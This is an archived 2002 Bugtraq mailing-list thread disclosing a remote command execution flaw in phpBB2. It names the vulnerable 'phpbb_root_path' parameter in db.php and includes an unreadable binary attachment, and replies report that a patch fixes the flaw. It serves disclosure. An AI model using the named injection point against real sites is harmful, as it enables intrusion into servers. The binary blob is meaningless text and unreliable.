8166109 2002-03-18 16:47 +0000  /25 rader/ nullbyte <nullbyte@inetd-secure.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-20  01:12  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Mottagare: Bugtraq (import) <21489>
Ärende: phpBB2 remote execution command
------------------------------------------------------------
From: nullbyte <nullbyte@inetd-secure.net>
To: bugtraq@securityfocus.com
Cc: vuln-dev@securityfocus.com
Message-ID: <Pine.BSF.4.44.0203181645580.19291-101000@inetd-secure.net>

phpBB2 is vulnerable to remote execution command

All *nix running phpBB2 versoion 2.0.

Bug could be found at "phpBB2 root path" which is allowed remote
attacker to execute any command remotely.  The vulnerability of this
attack start with '/phpBB2/includes/db.php?phpbb_root_path=' but some
backdoor server are needed to launch the attack.

I did not look further into this bug.  It is tested on most *nix
systems running phpBB2 version 2.0. Probably all versions.

Bug was found by pokley and nullbyte

nullbyte
nullbyte@inetd-secure.net
(8166109) /nullbyte <nullbyte@inetd-secure.net>/(Ombruten)
Bilaga (application/octet-stream) i text 8166110
Kommentar i text 8172819 av Nathan Anderson <nathan@andersonsplace.net>

8166110 2002-03-18 16:47 +0000  /11 rader/ nullbyte <nullbyte@inetd-secure.net>
Bilagans filnamn: "phpBB2.tar.gz"
Importerad: 2002-03-20  01:12  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Mottagare: Bugtraq (import) <21490>
Bilaga (text/plain) till text 8166109
Ärende: Bilaga (phpBB2.tar.gz) till: phpBB2 remote execution command
------------------------------------------------------------
‹›•<ìZy@×Ö‚`b}J«ÖÝËM’…U–!Ad‘EÑt’$’Ì„™	[\j[ªu©U\h­õ¹RqÁ}í¦u©K÷}£.µ¶µ‚UûÔïÎd!A\Ú¾öýñõª™™;çž{ιçþιg4ëÍññÁÎ_Ù@¨4",pE„ɘ+lRûÕþ"BCÃBd¡áÁLÂa©Töf¡h”€ƒ[ŒFM)=ÎªÇ0ãß!ÐßÛ̶õÏTÅ%¤ªþ¢9dRixhèS×_&“…;Ö?,8"öKe ý‹äqkÿÏןg[y.·”°€‘ÐÀ„aÌÏæbxáÒzà_ZjÀ6Êl$4(01—h¾)ÂKJі‚`%È¢@ÀðÅ1L4¨¶HG$ ­Ib€°Ð”A‡«Ö8
ÂpTcĂ(B[ÅÐx¡ÐBÂá´˜Çògx
F–zÂb„S`|K+¦!	‚:‰ii‚,ƒl=Š7Š֒JcÑi‚FBFK󔶷(«$ТF#0•RÅF1=ŠƒL̄™4	†¦çe\Z6ÈÉRôì$U&HL¨iq©*`ÁEÙ$r
À¡dŒyx¡˜ÇËftròf”¦¡‘i›-QA<^L,À´z
1fS р*¥hÌ$äkM:Q4ˆUðx(®cç@Ûêcx'%gՐŒéÉÙ
7=ùÉLéi 79-!=—gdWá„ XûhQŽdîØ^+œ”y@!×è
DQJÏsì˜~:”,¢´¨ãý¯½ùŸö{›ÿáE£a7û_0dzñ_шÿ!¡Lü

ÿÿÿŽלçÈÃøñ9ýe@‰Ý/¸ÖhÑa”D§aœ#–õ5ƒ¬j3Jëåzš6GI$H´‹`–EÆDÉY\ëÇ©FÉ!ºõh%w%‡0m¥
ŽÊA!Fcx‰IÊÎÎPC4ÍTÇõW¥e#"jƒÙ…0S•šž­RÇ%$d2DÆèi“Q/ªƒÚ@1…P+9¸#IÂ!2ÅL0N@€·ÆHl$¼‰}ˆ†Ð•M¡–0¤éÎ6¾ÐJj4ârD‹á4F"
S± ZLŽÆHŠ£Î^Ê0öÉ`”ßÝÎ,ºÛd‡4f ¢ñª!ÙnûÅ`*©•#”Ù +4"0rêà* Á}C Ç…zZŽ„†"c›áZÁÕ(vú'1ÝÁÈ)´´†›:0ný0“™.ò™°¦†ÁT$¯;	š#Ô&XO¥ƒA¸P(1lX”ƈâEQÇûku.OÂa#¢‡ˆø‚@à`ïà(ªYž®¼Yªa²áäÁ\Á³FðqÌʨ]Ï10ú©Äe3RØ3¸5ÇÕa4 fd¿/0Ï3dr56Ê@єÐ1‘ôé“涱ïYz;%uŠ'wJýG³àF7.ü“,žÚØSÆss77>çªá3Q«w§yRW¥±Q˜Vˆ˜­:W,zêBÛy'¤+sR!~©3ÓÓ³Ÿ3;±Ë0ÄèI—˜Ÿ‚45ÁÝl*e€ji1‰Ý‘6`ág$e¨³TaRˆÀäŽÖsÍE#ìV6+š…ç¬Ù(	!D¶'ƀ›-0-5CbE#v	h–,'s œeÄðBŠúJ;ô…CL*AÌ]8ç0F:Û¤vŒ ޑ#?oîø8eJBzz¦s.©›}›Ú1ÊefW¨F1ESôºgï¯K dÛñ0FØoJ(mþý\ìûÀE…ëeј´ZC㈝…­Ç©ã›sŒuO	*öb´„SP4dŒ„}¢IÔl†Ç’Øf„×ê1m‘†åPÀ6²é*-$	ã£ã|Óx°Š‚4
;[÷¬Ã±ԔÙh ix:“ÛŽ˜:LˆH@u¦h—ýd"—-e?¡@Obò|ĹbäU	ýƒQSØè„"ØSûZ4%s@C”(2aÞ#A®ùNžPÀXÄ|\w<âÊã©P·8än€ôÒh˜ü€x8´àt3Š˜÷Ía*Äì”âf$嚉2Ö¢/hÐæÅijâF4tÃE›¿k\6žž  a„jÎùlôf„vv̎WêQ¼Ù¡ðÐ-f UlÛhB‘ݽÖi^F|8Xw”f^h±ê™Š‚oóæìˆF>ÏÍ_1îyœuNv¸übäE‚½}å	3Vì ×ß¡N>„+ք˜NáØé	#ÇHlÃùx3Ëçh6owíÅdcÆ@€Þäó!ًŒ~r~ȋ„aÑWà&a9JGGkÞvèèè±”»Äÿ51`4ÇJ„v\…ÿ즳Ѵ6s°`ÄȟWãÏ'Ính˺Žä…<çÅãäÌg=]Á\þ§+åHòÇ%ú‰ú³òpGÓ!Ö6Å-WqœmË&YBº…†‰ETÓÜ)†I “¡0Ð)˜ÈÁ¼Ž9$Ës¡’À¥ÌAŸÅbî³”ìK¾-Iqõ®ƒ’
Š@¦Úd–¬Dl6XÑG
_‰Ý´F´(ݔ4À„¼I\.×阓¦‘<UJ¸&ÿŽ;‰£ þ€MÀ™0à´K·¤1̀ú¤šÍØÌÁ%WÚmÕ­i¸\.óÏæƒC	›:¶F
OYF¦JÏVþ%“¸0#<k›
u,$Øì0ZÐd)@Q.nâšM„r}p'…§:ÚÑÃ-kFxGïúž'=…i	(àß%>—ûÔås|W°}ãh~	™S†A‹©ÍIÛ*^L¦”É[€P`µZ@@kÍ×ê˜ý«‰ÜÎZm›J—¨NNSe‚¬teŠ:+;S—Ê<Tg+3D®îÁìgäºXם¯ž+`&£‹b6&EàQ̖qÌ
ƒ	k$'K[ÎçY\öHÏå“e1ºJMà8“£9ºœÝMÓ(<×^ÖaY5ž]7ùm38çã™v
<DÍéÒøòIUw|Τ÷ýUÙ¶jªÓ[ÙÂ("n&#€©yJdbY>žéQ.G¹)œ»MËg¼D
gŸ]f+i 1Wð@`Kž˜#îr~â:R7;l]ÆKCûŠšµ*3¬9K8ŒÍŠF/€[£ÌVª•8°ÞV_43EX&ñf˸LµƒÒ’3
Œ01· Ln>-A³ØNÄå<-	»m´0U×Z‹	&)lOÁs˜ØnfØ¡µPB(I,uóEÝgTN]
JÂ\J2õVÀT—e‘‘áAÁRiðSëÌ6¦q2ÙQ™[HÐv”%AË|RÔéQkP0)%Q&Ä7­ºJ˜ê4[¬fËÜÿ…ïmö:¿³¤üç9>ٞóý?<4"Ìùÿ?Â¥Ræû,,ìŸï?G{|òñEN»‰É‰Çþá<>ÃQrZ·jÅkåӚÇåµy©ußn/û¶më‹tîÒ¾›ˆà/äAÁý"‚¤r©@Ðw`¤\©JJN
OÏIKÌî×?IÅ0ñx©M߶¾~/¿ì§ĪßÝÁñmÅ	óèêépZøzxúz<ÞÉé	åléÁ6‡-<½Zzû´âòZC‚õí8-<<=[xy¶léåߖÁ÷/ߖ/ûÉâ¼_„ú ÅíƒÇO_ЪW|͗2ÿÌѐory_íÔ¹Kï>¡È?4,<¢od”2A•Ø?)y@VvÎàÜ!Có´:¬ PoIіë¨ÒÑÞzûòw'Nú`Æ̊Y³çÌ­ü÷ÂE‹—,]Võ隵ëÖoظió–¯vìüz×î={¿©=rôØñ'O¾tùJÝwW¯]¿ñýí_îÔ7ÜýõÞýŒ^OGkV/_¨W//O/F/V†À׫¥ŸÌûå¸A>hñ+HðøVíã§/¨ù’Û+$óçò0¯#?ôRïیj¬f/¦Ø›H3§bzæ¼äéÏӗË©zí^íýF«vÿ‡“3¡OTN@♥C¦=(yï1§_ތý¿®š?ç·#d¿&¯Ì8¡®¯=šûÓô‡ª¬¡ckvoiwaÎ×úMçz¯]¥À>zï^Õȇ/е_ì./˜»¯a岀åY—ÞK¼;ñ
OၒÁ³ýÆ]«¼“¥ls8ëËÁ»ÖÖlºH%/ï´7ÿû¡;zgͽ]©³FÏ輬χ+´¢‘	e4~uuÃí¦øj‘‹/W§qWTm©Úÿ¡|кŠ¢€ëN,Þû˺´ˆN»7®G‹½Z&;òz5zâþ;GftªW,<¿A|éÜûªÜÕÇÄ¡‘sZÞ©¾ðP×æ?»·[VŽ-ž¹®¤0ÌÐw‹_ÆÛo`kµÍ+;ðÕYÿ8|±IÙ{˞çc
~gû¥ë|eÕõ#έáw¬í’ØŚaùÕЮù%+:TnK] ˆ\vtìÏÉ¿i×X”ÚicÅêþæÆn~´÷nXçE‹tÚeõUSËUCDm,¯åE&žñÉÝ_—Y;öúåÂÁêÙwÚñ—^UouÓ´·2~¸&^èOrÂ>Mº\¾ñ¬fނiŸù„N¯Ònªï.¿ÁûÏ2Y^öi?©T$ç-þéT½râ­Ô}z­P…~%¿¯¤ƒhø‡ßOÚÊ]â;µT°^YDôþïKùõžÇNø8ÿ_É?ÝÈ3/yeOyElÙ֍9yëJ&ÅÜO=:&aeö® “·_Ö¬1¿ôT/Níæ÷j§*͸ÄMž•3LÔkA͔IßÉbË{ÏϨ|íؤjÙ ˆ轛9º°m9ûu{ê.,_™2&,pÅ׉ۨóëÖÔÌ;ƒ½{.¬n?iìܯnoêúÙ¯od¬éÀku¥vauôôw“+ª‡¯¾\š|cjC=Q>¶.¯öó›{>ääœÒÍz ¬ë¥oïw\·êÁrè”í•—Qõ=YCáûÃ6ßûÝéž=)ك>Ê;Ý6E?¶>¯ß³ªGÊùBݘöÆ<©>pï­Àéc/¤T^ûLÍ=2¡Ûøµ
-¶¤zË("Tw§ýD©bœ®ËÎÕ×Gßÿ÷ÄÄî›úòƑ;ïvØ}òüìÀ3“·ÊNT#ŸO½Û`åu+{ýøÃ)‡Nþ«h^êì<ˁm$÷ã]ñ™ªG¡¹‚¦–k—Û{ÉR^nt_|×Áu§~,×)¢ã-K»ÎÛѹ:rЀÞw7{Ý©]žŸ/nwïXÁÌ	Ǘ§DŒ(²ëb}אÂ…?½8!+Ù/lxå֋ÕdêمÝw>þåž3‰måy+ª†žQ_½zè>iíÑ@Öy++÷õ»ßnúÔuÂßØS!X+\qdç@jU¯Ë=ÆIéýZ-»ÖoçŒ#Ç?8ä‡/Ÿ¬;t«h^ûOS÷ªfÜzÌááûñ}ÂDѯëfŒãÔU·0t×àí)¼ukÀ«›W
f}æ•Î-›‘¶ÄgG]mG&øÜ
­{{À¢¼ÕÓ:^c§Qʏ¨­òµkl—
ߟ4M™ÜÐcý7˽4+ƒºU,ä7œ¬ìµ¾d¥÷èùy§Ö¾8¬foµÎ¿xÂ;ݧòòßþêãŠ)Ù·>¹ª7}2ÉóÍ`Që\ñÒ~ogl—¼ÀºB3yѬCæˆ6y%²ç4„i"[?ªl‡›å†ryúèJNñç'çÏ{ÿúîJýÊ·´·•ŽÑÔõPE]¼3º2û’OíÚ¼€yԀ¬µ×ßë2º"~wgM¿õÖòغ¡µcíÖn@͞šš/°+'O~Ôõ1gzaòcΪ¾cë=Òz¾"«>Q3éNÌPõÃ.Gm_ð˜s¸(©ç´]sêÞ½µKöhZÛó·æéñ€ý›WsoÐöKËÇ÷øäðôùá}<'×M»˜zðð‡¼ÑÛgÍÙ?¦6%©îµé§ÆLx³µõü5†øȘ~$æQ‘ûù´ÁµÊ÷†\šŸ²Õ_—Û«oÏ?R¿Bt½¡ÃÊ[g¿¨Ý¿%¡fxò¬)OtcùFåoŠûWÚÌùðjb÷Vrÿºã·÷y&^îð^3»ìÜ¢Ê7–>þ6è•+?®X|¿¡01¤Í]̧*‹ÏþÔÉ»úk?yÑÜuÛvX|¼7|²up÷Òe3»Djù¸ü¯*ò?«—yºSAUºtÐû#«¤kÏÝÑ;'d¡#ʽÅàͳ¯Vlñ8stþțSË»­ï¶kXÕ[onþVÝOžG:“ y{¼çO{^¹™yNý%êyúÔ&òÂÍ«=9ô íݢΝÎ'¥DìÙ^5|_nMƔþç&µ?10!6oM‹ÄòÕíóöÏïmõžsøî<xØ2õÇoãâý_ûõþ×üN§4J‘X5­W…b7DH*Ac«lB”­Ú¬U¬×èFxÓÛã™Äµ”XH¯d½Â¦¥Õ„ÉZ7Ù(ŒD‚xÕk­Çµ»Ü^ý±ÿ@9ŸßÎ9s¾ç;ß3s0W÷˜Ñ¡3Ü,òæ`ª#¯ÙX©¼êL2[ðp#øi6Ͷƺ­^*Ì\{6À†”Þ÷	©0`tö'öiYÙÆçÊL’
ÓéLJãýZùä'­Õì$ãô‹IܾRï贚ǙôZ_g5ƒpÏX„H&~.“
·ÐXƒ¬^çæWe2Ǔ¦x›÷U_´ >æBȄ£7úñ“ÒòÆÓQíC™v=õ¶#¦'ôꯑb&1Õl>xë¯ÇºÝ;‡„ºÔçµ=A²L]æµ=Y³ÒNFÅoð5d°ÕdÓ°!’sR}¨/¢Ó»AñÚzªpÉތŒÖFKrXßÜ
Mj=öB¯ˆ¹E|“š¥­U±ãØqg^e…Š˜b!ë‡/s|”FV¡3ü{ŠÏˆe2—U˜ª¦½Ú]~©{[Ÿñ­DÞ	·µÀɌ¨õ;7ÏZî~pùn]|ªÙîÊdœ¯ýñ–feSÂÄOq;òé2ühhÙ¯2ÜµÄ ñ…ú°z¼ˆ‰,Y)HS2ü]0‹_,z0zågÕö‰bIґ*¸ifN_w͋BUÿCÖé‰Aù#h$psIL²®lÚ îºû¢ŽâÒiݒ¾iržó
ÿÙk‡ŸäšÓ‚*þ´­…ŸÒ²LÞ&,zâÖ¯‹‡ÏŒ>õ{D²´9‰A©Ã‚7^®Ê:Lá–Ü_˜¢íÏYŽ•öÿþêlƒABƒäö*ͧ±ýòƒ–yu¯Pt|FCØKUwñ™“¤‹èy¿SÖrµr×iÑ\ðâJðòìñ३X;~ò®úTÈ£Õ¯s¾H~GÝéòDfŽôJÇ÷	Röóëyh3-/JFá<è£HEnšËWs‰±.Cc5/'5SŽ–°Ú5öaÐv|ÃzÎd?å,ô)JÇÌLödæUg3%Ú|Ëì©×ˍ‡ìÑùýr<Œ¢#ô6`O§"oÎãùš#y´¢œ„ºÓ¯ª`a&Yj€A½äýg\|{¨vï1{–»‡1ÈɽLÔ"/SÑo]/ِ»»¯”§¡U±‹A-ø¤\ó_”ì,KFÑO[y‚ô¿·ñ.NšÊãrXßÐÛ‰äZ¸^YÎWèäãìpN_²Àf¥ ÖÆÀ¨+ÛÁj_L!ø*‰uS´’䯌d„‰Û}ø¢zé{‚ö•ƒ¹Äñ	ÔÞÍãVã9¸ã¹²ÈR=<s*>Lúþ0”«šýÊ´H+eqÅ\Y÷I$O§¶cPõ¿A6Ô{
0eœ\l|Í;ˆÄ„y¾ìïé‰LwûÒ}´k¥N9fò>ák¤Xh_PÚÌÅÄÿק
þã ¦øP
(8166110) /nullbyte <nullbyte@inetd-secure.net>/(Ombruten)

8160619 2002-03-18 20:17 -0500  /44 rader/ Jose Romeo Vela <jrvela@aristasol.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-19  05:29  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Extern kopiemottagare: nullbyte@inetd-secure.net
Mottagare: Bugtraq (import) <21480>
Ärende: Re: phpBB2 remote execution command (fwd)
------------------------------------------------------------
From: Jose Romeo Vela <jrvela@aristasol.com>
To: <bugtraq@securityfocus.com>
Cc: <vuln-dev@securityfocus.com>, <nullbyte@inetd-secure.net>
Message-ID: <Pine.LNX.4.33.0203182010520.12002-100000@la-sirena.aristasol.com>


--- nullbyte <nullbyte@inetd-secure.net> wrote:
> phpBB2 is vulnerable to remote execution command
>
> All *nix running phpBB2 versoion 2.0.
>
> Bug could be found at "phpBB2 root path" which is allowed remote
> attacker
> to execute any command remotely.
> The vulnerability of this attack start with
> '/phpBB2/includes/db.php?phpbb_root_path=' but some backdoor server
> are needed to launch the attack.
>
> I did not look further into this bug.
> It is tested on most *nix systems running phpBB2 version 2.0.
> Probably all
> versions.
>
> Bug was found by pokley and nullbyte
>
> nullbyte
> nullbyte@inetd-secure.net
>

This bug only affects non-CVS versions. There is a fix available. For
details see:

http://phpbb.sourceforge.net/phpBB2/viewtopic.php?t=9105


---------------------------------------------------------------------
Jose Romeo Vela
jrvela@aristasol.com
http://www.aristasol.com/
(8160619) /Jose Romeo Vela <jrvela@aristasol.com>/--

8172819 2002-03-19 13:32 -0800  /15 rader/ Nathan Anderson <nathan@andersonsplace.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-03-21  08:48  av Brevbäraren
Extern mottagare: 'nullbyte' <nullbyte@inetd-secure.net>
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuln-dev@securityfocus.com
Mottagare: Bugtraq (import) <21522>
Kommentar till text 8166109 av nullbyte <nullbyte@inetd-secure.net>
Ärende: RE: phpBB2 remote execution command
------------------------------------------------------------
From: "Nathan Anderson" <nathan@andersonsplace.net>
To: "'nullbyte'" <nullbyte@inetd-secure.net>,
 <bugtraq@securityfocus.com>
Cc: <vuln-dev@securityfocus.com>
Message-ID: <002701c1cf8d$8ea3ea90$8f00a8c0@mt8100>

>>All *nix running phpBB2 versoion 2.0.<<


	Actually it is RC3 and prior.   There is a patch for this and the latest
CVS and RC4 do not have this problem.

Nathan.
(8172819) /Nathan Anderson <nathan@andersonsplace.net>/